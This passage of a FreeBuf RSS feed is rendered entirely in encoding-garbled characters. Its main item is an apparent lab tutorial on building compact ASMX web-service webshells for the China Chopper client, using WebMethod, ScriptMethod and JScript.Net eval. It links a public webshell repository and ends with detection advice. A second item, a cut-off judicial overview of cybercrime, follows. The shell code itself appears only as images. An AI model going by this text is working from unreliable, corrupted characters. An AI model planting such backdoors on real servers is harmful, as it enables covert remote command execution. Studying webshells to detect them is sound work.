WebService,然åŽç”Ÿæˆç›¸åº”çš„SOAP应ç”。WebæœåŠ¡å™¨å¾—åˆ°SOAP应ç”åŽï¼Œåœ¨é€šè¿‡HTTP应ç”的方å¼å°†å…¶è¿”回给客户端,但WebService也支æŒHTTP POST请求,仅需è¦åœ¨æœåŠ¡ç«¯å¢žåŠ ä¸€é¡¹é…ç½®å³å¯ã€‚ 0×03 一å¥è¯çš„实现 3.1ã€WebMethod 在Web Service程åºä¸ï¼Œå¦‚果一个公共方法想被外界访问调用的è¯ï¼Œå°±éœ€è¦åŠ ä¸ŠWebMethodï¼ŒåŠ ä¸Š[WebMethod]属性的公有方法就å¯ä»¥è¢«è®¿é—®ï¼Œè€Œæ²¡æœ‰åŠ è¿™ä¸ªå±žæ€§çš„æ–¹æ³•å°±æ˜¯ä¸èƒ½è¢«è®¿é—®çš„。将 WebMethod 属性 (Attribute) é™„åŠ åˆ° Public 方法表示希望将该方法公开为 XML Web services 的一部分,它具备6个属性:Description ã€EnableSessionã€MessageNameã€TransactionOptionã€CacheDurationã€BufferResponse,为了更清晰的表述WebService请看下é¢è¿™æ®µä»£ç å®¢æˆ·ç«¯é¢„è§ˆåŽ è¿™é‡Œå£°æ˜Žæˆä¸€ä¸ªå—符串类型的公共方法HelloWorldï¼Œå¦‚æžœæ¤æ—¶åœ¨æ–¹æ³•体内实现创建aspx文件,ä¿å˜å†…容为一å¥è¯å°é©¬çš„è¯é‚£ä¹ˆè¿™ä¸ªWebServiceå°±å˜æˆäº†æœåŠ¡åŽé—¨ï¼Œä¾ç…§è¿™ä¸ªæŽ¨ç†å°±äº§ç”Ÿäº†C#版本的WebServiceå°é©¬ï¼Œå®žçŽ°äº†ä¸¤ä¸ªåŠŸèƒ½ï¼Œä¸€ä¸ªæ˜¯åˆ›å»ºæ–‡ä»¶ï¼Œè¿˜æœ‰ä¸€ä¸ªæ˜¯æ‰§è¡ŒCMDå‘½ä»¤ï¼Œæ ¸å¿ƒä»£ç 如下:  å°é©¬è¿è¡ŒåŽæ‰§è¡Œwhoami命令之åŽä»¥é»˜è®¤XMLæ ¼å¼å›žæ˜¾æ•°æ®ï¼Œå¦‚下图  知é“原ç†åŽå°±å¼€å§‹ç€æ‰‹æ‰“é€ èœåˆ€å¯ç”¨çš„一å¥è¯æœ¨é©¬ï¼Œå’Œä¸€èˆ¬å¤„ç†ç¨‹åºç±»ä¼¼é€šè¿‡Jscript.Netçš„evalæ–¹æ³•åŽ»å®žçŽ°ä»£ç æ‰§è¡Œï¼Œå‰æ–‡æœ‰æåˆ°WebMethodå˜åœ¨å¤šä¸ªå±žæ€§ä¸”æ ¹æ®å¾®è½¯çš„官方文档 https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29 å¯ä»¥å¾—出Jscript.Netä¸å¯ä»¥ä½¿ç”¨WebMethodAttribute æ¥æ›¿ä»£[WebMethod]。 一å¥è¯å®žçŽ°çš„ä»£ç 如下: 打开æµè§ˆå™¨ï¼Œæµ‹è¯•效果如下  笔者ä¾ç…§SOAP1.1çš„è§„èŒƒè¦æ±‚,å‘é€è¯·æ±‚的数æ®åŒ…å°±å¯ä»¥å®žçް䏀å¥è¯ä»£ç 执行,这里还是拿当å‰çš„æ—¥æœŸæ—¶é—´ä½œä¸ºæ”»å‡»è½½è·ï¼Œå¦‚下图  3.2ã€ScriptMethod 在探索WebMethod的时候,å‘现VisualStudio有段注释如下图 å½“å®¢æˆ·ç«¯è¯·æ±‚çš„æ–¹å¼æ˜¯AJAX的时候会导入System.Web.Script.Services.ScriptService命å空间,笔者å°è¯•去挖掘一下å¯èƒ½å˜åœ¨çš„æ–°çš„æ”»å‡»ç‚¹  代ç 里ResponseFormat表示方法è¦è¿”回的类型,一般为Json或者XML; UseHttpGetç‰äºŽtrue表示å‰å°çš„ajax是通过GETå¯ä»¥è®¿é—®æ¤æ–¹æ³•,如果å‰å°ajax通过POST,则报错。 æ ¹æ®C#ä¸çš„代ç å¯çŸ¥éœ€è¦é…ç½®WebMethodå’ŒScriptMethodæ‰èƒ½æ£å¸¸çŽ©è½¬ï¼Œè€Œåœ¨Jscript.Netä¸å®žçŽ°è¿™ä¸¤ä¸ªåŠŸèƒ½çš„åˆ†ç±»æ˜¯WebMethodAttribute类和ScriptMethodAttribute类,最终 写出一å¥è¯æœ¨é©¬æœåŠ¡ç«¯ä»£ç : 客户端输入 Response.Write(DateTime.Now)æˆåŠŸæ‰“å°å‡ºå½“剿—¶é—´ï¼Œè¡¨ç¤ºä¸€å¥è¯æˆåŠŸè¿è¡Œï¼ 坿ƒœçš„æ˜¯è¿™ç§æ–¹æ³•䏿”¯æŒ.NET  2.0ç©¶å…¶åŽŸå› æ˜¯using System.Web.Script.Services;这个命å空间并ä¸åœ¨System.Webä¸ï¼Œè€Œæ˜¯åœ¨ajax扩展ä¸éœ€è¦é¢å¤–安装ASP.NET 2.0 AJAX  Extensions,所以在2.0的环境下尽é‡é¿å…使用该方法。 0X04 èœåˆ€è¿žæŽ¥ èœåˆ€ä¸æ”¯æŒSOAPçš„æ–¹å¼æäº¤payload,直接连接asmx文件就会出现下图错误 第一ç§è§£å†³æ–¹æ³•å¯ä»¥è‡ªå·±å†™ä»£ç 实现支æŒSOAP的客户端; 第二ç§åŠžæ³•å‚考asmx页颿œ€ä¸‹æ–¹ç»™å‡ºçš„HTTP POSTæäº¤æ–¹å¼ï¼› 本地环境下用èœåˆ€è¿žæŽ¥æ²¡é—®é¢˜ï¼Œå¯ä»¥æ£å¸¸è¿žæŽ¥ 但通常部署到æœåŠ¡å™¨ä¸Šå¯èƒ½ä¼šé‡åˆ°ä¸‹é¢çš„æç¤º 解决上述的问题需è¦åœ¨web.configä¸é…ç½®webServices节点接收的Protoclos节点下需è¦åŒ…å«HttpPost  多数情况下程åºå¼€å‘者会支æŒHTTP POST请求,所以对æ¤ä¸å¿…过于担心。笔者基于优化考虑将asmxWebMethodSpy.asmx进一æ¥åŽ‹ç¼©ä½“ç§¯åŽåªæœ‰499个å—节,asmxScriptMethodSpy.asmxä¹Ÿåªæœ‰547个å—节。  0×05 防御措施 1. […]]]></description>
1723 <content:encoded><![CDATA[<h2>0×01 å‰è¨€<br /></h2>
1724<p><b style="color: rgb(0, 176, 80);">上篇介ç»äº†<a href="http://www.freebuf.com/column/177781.html" target="_blank" ref="">一般处ç†ç¨‹åºï¼ˆashx)的工作原ç†</a>以åŠå®žçް䏀å¥è¯æœ¨é©¬çš„过程,今天接ç€ä»‹ç»Web Service程åºï¼ˆasmx)下的工作原ç†å’Œå¦‚何实现一å¥è¯æœ¨é©¬ï¼Œå½“然介ç»ä¹‹å‰ç¬”者找到了一款asmx马儿 <a href="https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx">https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx</a> ï¼Œä¾æ—§æ˜¯ä¸€ä¸ªå¤§é©¬å¦‚下图:</b></p>
1725<p><img src="http://image.3001.net/images/20180719/15319714816588.png!small"></p>
1726<p>è¿™ä¸ªè¿˜åªæ˜¯å¯¹å®¢æˆ·ç«¯çš„èœåˆ€åšäº†é€‚é…å¯ç”¨ï¼Œæš‚æ—¶ä¸ç¬¦åˆä¸€å¥è¯æœ¨é©¬çš„ç‰¹ç‚¹å“ˆï¼Œè‡³äºŽè¦æ‰“é€ ä¸€æ¬¾å±…å®¶æ—…è¡Œå¿…å¤‡çš„èœåˆ€é©¬ï¼Œè¿˜å¾—从原ç†ä¸Šæžæ¸…楚 asmxçš„è¿è¡Œè¿‡ç¨‹ã€‚ </p>
1727<h2>0×02 简介和原ç†</h2>
1728<p>Web Service是一个基于å¯ç¼–程的web的应用程åºï¼Œç”¨äºŽå¼€å‘分布å¼çš„互æ“作的应用程åºï¼Œä¹Ÿæ˜¯ä¸€ç§webæœåŠ¡ï¼ŒWeb Service的主è¦ç›®æ ‡æ˜¯è·¨å¹³å°çš„å¯äº’æ“ä½œæ€§ï¼Œä¸ºäº†å®žçŽ°è¿™ä¸€ç›®æ ‡Web Service 完全基于XMLï¼ˆå¯æ‰©å±•æ ‡è®°è¯è¨€ï¼‰ã€XSD(XML Schema)ç‰ç‹¬ç«‹äºŽå¹³å°ã€ç‹¬ç«‹äºŽè½¯ä»¶ä¾›åº”å•†çš„æ ‡å‡†ï¼Œæ˜¯åˆ›å»ºå¯äº’æ“作的ã€åˆ†å¸ƒå¼åº”用程åºçš„æ–°å¹³å°ã€‚简å•çš„æ¥è¯´Web Service具备三个è¦ç´ SOAP(Simple Object Access Protocol)ã€WSDL(WebServicesDescriptionLanguage)ã€UDDI(UniversalDescriptionDiscovery andIntegration)之一, SOAPç”¨æ¥æè¿°ä¼ é€’ä¿¡æ¯çš„æ ¼å¼ï¼Œ WSDL ç”¨æ¥æè¿°å¦‚ä½•è®¿é—®å…·ä½“çš„æŽ¥å£ï¼Œ UDDI用æ¥ç®¡ç†ï¼Œåˆ†å‘查询webService ï¼Œä¹Ÿå› æ¤ä½¿ç”¨Web Service有许多优点,例如å¯ä»¥è·¨å¹³å°å·¥ä½œã€éƒ¨ç½²å‡çº§ç»´æŠ¤èµ·æ¥ç®€å•方便ã€å®žçŽ°å¤šæ•°æ®å¤šä¸ªæœåŠ¡çš„èšåˆä½¿ç”¨ç‰ç‰ã€‚å†ç»“åˆä¸‹å›¾è¯´æ˜Žä¸€ä¸‹WebService工作的æµç¨‹</p>
1729<p><img src="http://image.3001.net/images/20180719/15319715209609.png!small"></p>
1730<p>æ— è®ºä½¿ç”¨ä»€ä¹ˆå·¥å…·ã€è¯è¨€ç¼–写WebService,都å¯ä»¥ä½¿ç”¨ SOAP å议通过 HTTP调用,创建 WebService åŽï¼Œä»»ä½•è¯è¨€ã€å¹³å°çš„客户都å¯ä»¥é˜…读 WSDL 文档æ¥è°ƒç”¨ WebService ï¼ŒåŒæ—¶å®¢æˆ·ç«¯ä¹Ÿå¯ä»¥æ ¹æ® WSDL æè¿°æ–‡æ¡£ç”Ÿæˆä¸€ä¸ª SOAP 请求信æ¯å¹¶å‘é€åˆ°WebæœåŠ¡å™¨ï¼ŒWebæœåС噍å†å°†è¯·æ±‚转å‘ç»™WebService 请求处ç†å™¨ã€‚</p>
1731<p>对于.Net而言,WebService请求处ç†å™¨åˆ™æ˜¯ä¸€ä¸ª .NET Framework 自带的 ISAPI Extension。Web请求处ç†å™¨ç”¨äºŽè§£æžæ”¶åˆ°çš„SOAP请求,调用 WebService,然åŽç”Ÿæˆç›¸åº”çš„SOAP应ç”。WebæœåŠ¡å™¨å¾—åˆ°SOAP应ç”åŽï¼Œåœ¨é€šè¿‡HTTP应ç”的方å¼å°†å…¶è¿”回给客户端,但WebService也支æŒHTTP POST请求,仅需è¦åœ¨æœåŠ¡ç«¯å¢žåŠ ä¸€é¡¹é…ç½®å³å¯ã€‚</p>
1732<h2>0×03 一å¥è¯çš„实现</h2>
1733<h3>3.1ã€WebMethod</h3>
1734<p>在Web Service程åºä¸ï¼Œå¦‚果一个公共方法想被外界访问调用的è¯ï¼Œå°±éœ€è¦åŠ ä¸ŠWebMethodï¼ŒåŠ ä¸Š[WebMethod]属性的公有方法就å¯ä»¥è¢«è®¿é—®ï¼Œè€Œæ²¡æœ‰åŠ è¿™ä¸ªå±žæ€§çš„æ–¹æ³•å°±æ˜¯ä¸èƒ½è¢«è®¿é—®çš„。将 WebMethod 属性 (Attribute) é™„åŠ åˆ° Public 方法表示希望将该方法公开为 XML Web services 的一部分,它具备6个属性:Description ã€EnableSessionã€MessageNameã€TransactionOptionã€CacheDurationã€BufferResponse,为了更清晰的表述WebService请看下é¢è¿™æ®µä»£ç </p>
1735<p><img src="http://image.3001.net/images/20180719/15319718869912.png!small"></p>
1736<p>客户端预览åŽ</p>
1737<p><img src="http://image.3001.net/images/20180719/15319715792826.png!small"></p>
1738<p>这里声明æˆä¸€ä¸ªå—符串类型的公共方法HelloWorldï¼Œå¦‚æžœæ¤æ—¶åœ¨æ–¹æ³•体内实现创建aspx文件,ä¿å˜å†…容为一å¥è¯å°é©¬çš„è¯é‚£ä¹ˆè¿™ä¸ªWebServiceå°±å˜æˆäº†æœåŠ¡åŽé—¨ï¼Œä¾ç…§è¿™ä¸ªæŽ¨ç†å°±äº§ç”Ÿäº†C#版本的WebServiceå°é©¬ï¼Œå®žçŽ°äº†ä¸¤ä¸ªåŠŸèƒ½ï¼Œä¸€ä¸ªæ˜¯åˆ›å»ºæ–‡ä»¶ï¼Œè¿˜æœ‰ä¸€ä¸ªæ˜¯æ‰§è¡ŒCMDå‘½ä»¤ï¼Œæ ¸å¿ƒä»£ç 如下: </p>
1739<p><img src="http://image.3001.net/images/20180719/15319716815877.png!small"><img src="http://image.3001.net/images/20180719/15319717042847.png!small">å°é©¬è¿è¡ŒåŽæ‰§è¡Œwhoami命令之åŽä»¥é»˜è®¤XMLæ ¼å¼å›žæ˜¾æ•°æ®ï¼Œå¦‚下图 </p>
1740<p><img src="http://image.3001.net/images/20180719/15319717567887.png!small"></p>
1741<p>知é“原ç†åŽå°±å¼€å§‹ç€æ‰‹æ‰“é€ èœåˆ€å¯ç”¨çš„一å¥è¯æœ¨é©¬ï¼Œå’Œä¸€èˆ¬å¤„ç†ç¨‹åºç±»ä¼¼é€šè¿‡Jscript.Netçš„evalæ–¹æ³•åŽ»å®žçŽ°ä»£ç æ‰§è¡Œï¼Œå‰æ–‡æœ‰æåˆ°WebMethodå˜åœ¨å¤šä¸ªå±žæ€§ä¸”æ ¹æ®å¾®è½¯çš„官方文档 <a href="https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3Dvs.80%29">https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29</a> å¯ä»¥å¾—出Jscript.Netä¸å¯ä»¥ä½¿ç”¨WebMethodAttribute æ¥æ›¿ä»£[WebMethod]。</p>
1742<p>一å¥è¯å®žçŽ°çš„ä»£ç 如下:</p>
1743<p><img src="http://image.3001.net/images/20180719/15319717968560.png!small">打开æµè§ˆå™¨ï¼Œæµ‹è¯•效果如下 </p>
1744<p><img src="http://image.3001.net/images/20180719/15319719181734.png!small"></p>
1745<p>笔者ä¾ç…§SOAP1.1çš„è§„èŒƒè¦æ±‚,å‘é€è¯·æ±‚的数æ®åŒ…å°±å¯ä»¥å®žçް䏀å¥è¯ä»£ç 执行,这里还是拿当å‰çš„æ—¥æœŸæ—¶é—´ä½œä¸ºæ”»å‡»è½½è·ï¼Œå¦‚下图 </p>
1746<p><img src="http://image.3001.net/images/20180719/15319719331646.png!small"></p>
1747<h3>3.2ã€ScriptMethod</h3>
1748<p>在探索WebMethod的时候,å‘现VisualStudio有段注释如下图</p>
1749<p><img src="http://image.3001.net/images/20180719/15319719465013.png!small">å½“å®¢æˆ·ç«¯è¯·æ±‚çš„æ–¹å¼æ˜¯AJAX的时候会导入System.Web.Script.Services.ScriptService命å空间,笔者å°è¯•去挖掘一下å¯èƒ½å˜åœ¨çš„æ–°çš„æ”»å‡»ç‚¹ </p>
1750<p><img src="http://image.3001.net/images/20180719/15319719664904.png!small"></p>
1751<p>代ç 里ResponseFormat表示方法è¦è¿”回的类型,一般为Json或者XML; UseHttpGetç‰äºŽtrue表示å‰å°çš„ajax是通过GETå¯ä»¥è®¿é—®æ¤æ–¹æ³•,如果å‰å°ajax通过POST,则报错。</p>
1752<p>æ ¹æ®C#ä¸çš„代ç å¯çŸ¥éœ€è¦é…ç½®WebMethodå’ŒScriptMethodæ‰èƒ½æ£å¸¸çŽ©è½¬ï¼Œè€Œåœ¨Jscript.Netä¸å®žçŽ°è¿™ä¸¤ä¸ªåŠŸèƒ½çš„åˆ†ç±»æ˜¯WebMethodAttribute类和ScriptMethodAttribute类,最终</p>
1753<p>写出一å¥è¯æœ¨é©¬æœåŠ¡ç«¯ä»£ç :</p>
1754<p><img src="http://image.3001.net/images/20180719/15319719923392.png!small">客户端输入 Response.Write(DateTime.Now)æˆåŠŸæ‰“å°å‡ºå½“剿—¶é—´ï¼Œè¡¨ç¤ºä¸€å¥è¯æˆåŠŸè¿è¡Œï¼</p>
1755<p><img src="http://image.3001.net/images/20180719/15319720212810.png!small"></p>
1756<p><img src="http://image.3001.net/images/20180719/153197202730.png!small"></p>
1757<p>坿ƒœçš„æ˜¯è¿™ç§æ–¹æ³•䏿”¯æŒ.NET 2.0ç©¶å…¶åŽŸå› æ˜¯using System.Web.Script.Services;这个命å空间并ä¸åœ¨System.Webä¸ï¼Œè€Œæ˜¯åœ¨ajax扩展ä¸éœ€è¦é¢å¤–安装ASP.NET 2.0 AJAX </p>
1758<p>Extensions,所以在2.0的环境下尽é‡é¿å…使用该方法。</p>
1759<h2>0X04 èœåˆ€è¿žæŽ¥</h2>
1760<p>èœåˆ€ä¸æ”¯æŒSOAPçš„æ–¹å¼æäº¤payload,直接连接asmx文件就会出现下图错误</p>
1761<p><img src="http://image.3001.net/images/20180719/15319720528158.png!small"></p>
1762<p>第一ç§è§£å†³æ–¹æ³•å¯ä»¥è‡ªå·±å†™ä»£ç 实现支æŒSOAP的客户端;</p>
1763<p>第二ç§åŠžæ³•å‚考asmx页颿œ€ä¸‹æ–¹ç»™å‡ºçš„HTTP POSTæäº¤æ–¹å¼ï¼›</p>
1764<p><img src="http://image.3001.net/images/20180719/15319720827912.png!small">本地环境下用èœåˆ€è¿žæŽ¥æ²¡é—®é¢˜ï¼Œå¯ä»¥æ£å¸¸è¿žæŽ¥</p>
1765<p><img src="http://image.3001.net/images/20180719/1531972095995.png!small"></p>
1766<p><img src="http://image.3001.net/images/20180719/15319721028773.png!small"></p>
1767<p>但通常部署到æœåŠ¡å™¨ä¸Šå¯èƒ½ä¼šé‡åˆ°ä¸‹é¢çš„æç¤º</p>
1768<p><img src="http://image.3001.net/images/20180719/15319721454688.png!small"></p>
1769<p>解决上述的问题需è¦åœ¨web.configä¸é…ç½®webServices节点接收的Protoclos节点下需è¦åŒ…å«HttpPost </p>
1770<p><img src="http://image.3001.net/images/20180719/15319721582326.png!small">多数情况下程åºå¼€å‘者会支æŒHTTP POST请求,所以对æ¤ä¸å¿…过于担心。笔者基于优化考虑将asmxWebMethodSpy.asmx进一æ¥åŽ‹ç¼©ä½“ç§¯åŽåªæœ‰499个å—节,asmxScriptMethodSpy.asmxä¹Ÿåªæœ‰547个å—节。 </p>
1771<p><img src="http://image.3001.net/images/20180719/15319721743083.png!small"></p>
1772<h2>0×05 防御措施</h2>
1773<p>1. 通过èœåˆ€è¿žæŽ¥çš„æ–¹å¼ï¼Œæ·»åŠ å¯ä»¥æ£€æµ‹èœåˆ€å…³é”®ç‰¹å¾çš„规则;</p>
1774<p>2. 对于Web应用æ¥è¯´ï¼Œå°½é‡ä¿è¯ä»£ç 的安全性;</p>
1775<p>3. 对于IDSè§„åˆ™å±‚é¢æ¥è¯´ï¼Œä¸Šä¼ 的时候å¯ä»¥åŠ å…¥WebMethodAttributeç‰å…³é”®è¯çš„æ£€æµ‹</p>
1776<h2>0×06 å°ç»“</h2>
1777<p>1. 还有本文æä¾›äº†ä¸¤ç§æ–¹å¼å®žçްasmx一å¥è¯çš„æ€è·¯ï¼Œå½“ç„¶è¿˜æœ‰æ›´å¤šç¼–å†™ä¸€å¥è¯çš„æŠ€å·§æœ‰å¾…å‘æŽ˜ï¼Œä¸‹æ¬¡å°†ä»‹ç»å¦å¤–一ç§å§¿åŠ¿ï¼Œæ•¬è¯·æœŸå¾…ï¼›</p>
1778<p>2. æ–‡ç« çš„ä»£ç 片段请å‚考 <a href="https://github.com/Ivan1ee">https://github.com/Ivan1ee</a> ï¼›</p>
1779<h2>0×07 å‚考链接</h2>
1780<blockquote><p><a href="https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3Dvs.80%29">https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29</a></p>
1781<p><a href="https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx">https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx</a></p>
1782<p><a href="https://www.cnblogs.com/bpdwn/p/3479421.html">https://www.cnblogs.com/bpdwn/p/3479421.html</a></p>
1783<p><a href="https://github.com/Ivan1ee">https://github.com/Ivan1ee</a></p>
1784</blockquote>
1785<p><b style="color: rgb(159, 163, 168);">*本文作者:360云影实验室,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1786]]></content:encoded>
1787 <wfw:commentRss>http://www.freebuf.com/articles/web/178010.html/feed</wfw:commentRss>
1788 <slash:comments>2</slash:comments>
1789 </item>
1790 <item>
1791 <title>ä»Žå¸æ³•角度看互è”网黑产</title>
1792 <link>http://www.freebuf.com/articles/network/178114.html</link>
1793 <comments>http://www.freebuf.com/articles/network/178114.html#comments</comments>
1794 <pubDate>Wed, 25 Jul 2018 00:30:37 +0000</pubDate>
1795 <dc:creator>boshit</dc:creator>
1796 <category><![CDATA[网络安全]]></category>
1797 <category><![CDATA[互è”网]]></category>
1798 <category><![CDATA[叿³•]]></category>
1799 <category><![CDATA[黑产]]></category>
1800
1801 <guid isPermaLink="false">http://www.freebuf.com/?p=178114</guid>
1802 <description><![CDATA[上个月,北京市海淀区人民检察院å‘å¸ƒäº†ã€Šç½‘ç»œå®‰å…¨åˆ‘äº‹å¸æ³•ä¿æŠ¤ç™½çš®ä¹¦ã€‹ã€‚ ã€Šç™½çš®ä¹¦ã€‹æ ¹æ®æµ·æ·€æ£€å¯Ÿé™¢2016å¹´9月以æ¥å—ç†çš„450èµ·ç½‘ç»œçŠ¯ç½ªæ¡ˆä»¶ï¼Œä»Žå¸æ³•的角度,结åˆå…·ä½“æ¡ˆä¾‹ï¼Œæ€»ç»“äº†æˆ‘å›½è¿‘å‡ å¹´æ¥äº’è”网黑产行业的现状。 《白皮书》æ€ç»´å¯¼å›¾ï¼Œç‚¹å‡»å›¾ç‰‡å¯æŸ¥çœ‹å¤§å›¾ ä¸€ã€æ¡ˆä»¶åŸºæœ¬æƒ…况 2016å¹´9月以æ¥,北京市海淀区人民检察院å—ç†ç½‘络犯罪案件450件(1076人),å…¶ä¸å®¡æŸ¥é€®æ•245件(588人),审查起诉205件(488人),涉åŠ27个罪å。 å„ç±»åž‹çŠ¯ç½ªå æ¯” äºŒã€æ¡ˆä»¶ç‰¹å¾ 1 低龄ã€ä½Žå¦åŽ†åŒ– 犯罪主体呈现低龄ã€ä½Žå¦åŽ†åŒ–ç‰¹å¾ã€‚ 犯罪普é呈现年轻低龄化: 1990å¹´-1999年出生的221人,å æ¯”37.58%ï¼› 1980å¹´-1989年出生283人,å æ¯”A812%ï¼› 1970年以å‰å‡ºç”Ÿäººæ•°ä»…å 14.11%。  犯罪的行为人普éå¦åŽ†è¾ƒä½Žï¼š 本科åŠå…¶ä»¥ä¸Šå¦åކ82人,ä»…å 21%ï¼› 高ä¸ã€é«˜èŒæ•™è‚²ä¸»ä½“68人,åˆä¸ã€ä¸ä¸“ã€å°å¦ç‰æ•™è‚²ä¸»ä½“242人,å 62.5%。 男性主体å 较大比é‡,审查起诉案件ä¸ç”·æ€§379人,å æ¯”77.66%。 2 跨地域作案 çªç ´äº†ä¼ 统地域空间的é™åˆ¶,è·¨åœ°åŸŸä½œæ¡ˆç‰¹å¾æ˜Žæ˜¾ã€‚作案地点涵盖全国28个çœã€å¸‚ã€è‡ªæ²»åŒºã€‚ 一是犯罪行为实施地和犯罪结果地之间跨地域。 二是犯罪主体之间跨地域。 三是掩饰ã€éšçž’赃物跨区域。 3 产业化 犯罪行为产业化,æ—¥æ¸å½¢æˆå®Œæ•´ã€é—åˆçš„产业链æ¡ã€‚è¾ƒä¹‹äºŽä¼ ç»ŸçŠ¯ç½ª,网络犯罪的产业化链æ¡ç‰¹å¾æ˜Žæ˜¾,产业链的上ã€ä¸ã€ä¸‹æ¸¸çŠ¯ç½ªåˆ†å·¥æ˜Žç¡®ã€‚ 4 组织化 犯罪组织多以公å¸ã€é›†å›¢çš„å½¢æ€å‡ºçŽ°ã€‚ä»¥æ³¨å†Œå…¬å¸å½¢å¼,æœ‰ç»„ç»‡ã€æœ‰è§„模地实施犯罪行为。 5 范围广 å—害人数多,犯罪数é¢å¤§,å½±å“范围广。 6 å…¨çƒåŒ– 跨国犯罪趋势增强,å…¨çƒåŒ–ç‰¹å¾æ˜Žæ˜¾ã€‚ ä¸‰ã€æ¡ˆä»¶ç±»åž‹ 网络空间å‘ç”Ÿçš„è¿æ³•犯罪行为,既有å¯èƒ½æ˜¯åˆ©ç”¨ç½‘ç»œå®žæ–½çš„ä¼ ç»Ÿè¿æ³•犯罪,也å¯èƒ½æ˜¯é’ˆå¯¹ç½‘ç»œã€æ•°æ®æœ¬èº«çš„è¿æ³•çŠ¯ç½ªè¡Œä¸ºã€‚æœ¬æ–‡å°†ç½‘ç»œçŠ¯ç½ªåˆ†ä¸ºï¼šç½‘ç»œé»‘äº§çŠ¯ç½ªå’Œç½‘ç»œåŒ–çš„ä¼ ç»ŸçŠ¯ç½ªã€‚ 网络黑产犯罪以计算机数æ®ã€ç¨‹åºç³»ç»Ÿæˆ–者软件ç‰ä½œä¸ºçŠ¯ç½ªå¯¹è±¡,å½¢æˆäº†ä¸€æ¡å°é—的产业链。上游æä¾›å·¥å…·å’Œå¹³å°ï¼Œä¸æ¸¸èŽ·å–ä¿¡æ¯ã€æ¸…æ´—æ•°æ®,下游精准诈骗产ã€ç›—窃财产,呈现产业化ã€å…¬å¸åŒ–ã€å¹³å°åŒ–的特å¾ï¼Œå¤§å¤§é™ä½Žäº†çŠ¯ç½ªæˆæœ¬,æé«˜äº†çŠ¯ç½ªæ•ˆçŽ‡ã€‚å®žè·µä¸æ¤ç±»æ¡ˆä»¶ä»¥ç ´å计算机信æ¯ç³»ç»Ÿç½ªã€éžæ³•获å–计算机信æ¯ç³»ç»Ÿæ•°æ®ç½ªã€ä¾µçŠ¯å…¬æ°‘ä¸ªäººä¿¡æ¯ç½ªä¸ºä¸»ã€‚ ä¼ ç»ŸçŠ¯ç½ªçš„ç½‘ç»œåŒ–,æ˜¯çŽ°å®žçš„çŠ¯ç½ªä¸»ä½“åˆ©ç”¨ä¿¡æ¯æŠ€æœ¯åœ¨ç½‘ç»œç©ºé—´å®žæ–½çš„çŠ¯ç½ªè¡Œä¸º,æ²¡æœ‰åˆ›è®¾æ–°çš„æ³•å¾‹å…³ç³»ã€‚ç½‘ç»œç©ºé—´åªæ˜¯çŠ¯ç½ªçš„è½½ä½“,è®¡ç®—æœºåªæ˜¯è¾…åŠ©æ‰‹æ®µã€‚å¦‚è½¬ç§»åˆ°çº¿ä¸Šçš„éžæ³•叿”¶å…¬ä¼—å˜æ¬¾ã€é›†èµ„诈骗ç‰çŠ¯ç½ªã€‚æ¤å¤–,ä¼ æ’æ·«ç§½ç‰©å“牟利罪ã€å¼€è®¾èµŒåœºç½ªç‰ä¼ 统犯罪也日æ¸å¤šå‘,呈现出新的特点。 å››ã€ç½‘络黑产犯罪 网络黑产已ç»ä»ŽåŽŸå§‹ç²—æ”¾çš„ä¼ æ’æœ¨é©¬ç—…毒ã€ç”µè¯è¯ˆéª—转化为更为先进的拖库撞库ã€ç²¾å‡†è¯ˆéª—,å½¢æˆå分æˆç†Ÿçš„è¿ä½œæ¨¡å¼,äº§ä¸šé“¾å¤æ‚ã€éšè”½ã€å®Œæ•´ã€é«˜æ•ˆã€‚ 上游技术供应商,承担ç€åˆ¶ä½œæœ¨é©¬ã€æ¶æ„代ç 肉鸡网络ã€åЍæ€ipéžæ³•æœåŠ¡ç‰æŠ€æœ¯å·¥å…·æœåŠ¡; 䏿¸¸æ•°æ®æœåС商ã€é»‘市交易平å°,在产业链ä¸å……当数æ®ç”Ÿäº§è€…和交易æœåŠ¡æä¾›è€…的角色; ä¸‹æ¸¸è¡Œä¸ºäººåˆ©ç”¨ä¸æ¸¸çš„æ•°æ®å’Œå¹³å°å®žçŽ°ç›´æŽ¥è¯ˆéª—ã€â€œè–…羊毛â€ã€æµé‡åŠ«æŒç‰çŠ¯ç½ªã€‚ 在该产业链ä¸,基于行为人目的的ä¸åŒ,上ã€ä¸ã€ä¸‹æ¸¸å¯ä»¥ä»»æ„组åˆ,å½¢æˆå…¸åž‹æˆ–éžå…¸åž‹çš„网络黑产犯罪。 1 ä¸Šæ¸¸çŠ¯ç½ªäº§ä¸šé“¾åˆ†æž ä¸Šæ¸¸çŠ¯ç½ªçš„å‡ºçŽ°æ˜¯ç½‘ç»œé»‘äº§äº§ä¸šåŒ–çš„ä½“çŽ°ã€‚ ç½‘ç»œå¹³å°æä¾›è€… éžæ³•利用信æ¯ç½‘络。 ä¸ºå®žæ–½çŠ¯ç½ªè€Œä¸“é—¨æž¶è®¾éžæ³•网站,多数用于实施“钓鱼诈骗â€,属于电信诈骗犯罪ä¸ä¸å¯æˆ–缺的关键环节。 专门黑客类网站æˆä¸ºçŠ¯ç½ªæ–¹æ³•ã€çŠ¯ç½ªå·¥å…·ã€è¿æ³•ä¿¡æ¯çš„呿ºåœ°ã€‚ QQ群ã€å¾®ä¿¡ç¾¤ç‰é€šè®¯ç¾¤ç»„便—§æ˜¯è¿æ³•ä¿¡æ¯äº¤æ˜“ã€äº¤æ¢çš„ä¸»è¦æ¸ é“ã€‚å¤šæ•°è¿æ³•行为人倾å‘选择使用第三方支付æœåС平å°è¿›è¡Œèµ„金结算,而网络æœåŠ¡æä¾›è€…对公民个人éšç§ä¿æŠ¤å’Œä¾¦æŸ¥æœºå…³å–è¯éœ€æ±‚之间的矛盾日益凸显。 技术工具æä¾›è€… 